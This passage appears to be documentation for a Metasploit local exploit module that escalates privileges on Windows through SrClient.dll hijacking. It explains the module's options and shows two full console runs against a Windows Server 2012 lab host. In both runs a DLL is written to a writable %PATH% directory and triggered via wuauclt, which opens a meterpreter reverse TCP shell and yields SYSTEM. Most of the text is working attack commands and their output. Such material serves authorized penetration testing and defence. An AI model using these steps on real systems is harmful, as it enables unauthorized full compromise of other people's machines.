3. Do: `set SESSION [SESSION ID]`
4. Do: `run`

## Options
### WRITABLE_PATH_DIR
The full path to a writable %PATH% directory to write the payload to. If this is not set,
the module will enumerate the %PATH% directories and try to find one that is writable by the current user.
### STEALTH_ONLY
If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the
`WUAUCLT /DetectNow` command, which will launch Windows Update in the background.
This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.

## Scenarios
### Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true
```
msf6 exploit(windows/local/srclient_dll_hijacking) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  3         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49157 (192.168.91.16)

msf6 exploit(windows/local/srclient_dll_hijacking) > show options 

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION            3                yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.91.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*]     Everyone
[*]     BUILTIN\Users
[*]     NT AUTHORITY\INTERACTIVE
[*]     CONSOLE LOGON
[*]     NT AUTHORITY\Authenticated Users
[*]     NT AUTHORITY\This Organization
[*]     NT AUTHORITY\Local account
[*]     LOCAL
[*]     NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*]     Checking permissions for C:\Windows\system32
[*]     Checking permissions for C:\Windows
[*]     Checking permissions for C:\Windows\System32\Wbem
[*]     Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0\
[*]     Checking permissions for C:\wynter
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*] 
[*]     C:\wynter
[*] 
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 4 opened (192.168.91.12:4444 -> 192.168.91.16:49159) at 2021-02-16 08:59:24 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
### Windows 2012 x64 - WRITABLE_PATH_DIR option set, Verbose set to false
```
msf6 exploit(windows/local/srclient_dll_hijacking) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  8         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49158 (192.168.91.16)

msf6 exploit(windows/local/srclient_dll_hijacking) > show options 

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION            8                yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WRITABLE_PATH_DIR  c:\wynter        no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.91.12:5555 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to c:\wynter
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[!] Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 9 opened (192.168.91.12:5555 -> 192.168.91.16:49160) at 2021-02-16 09:12:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```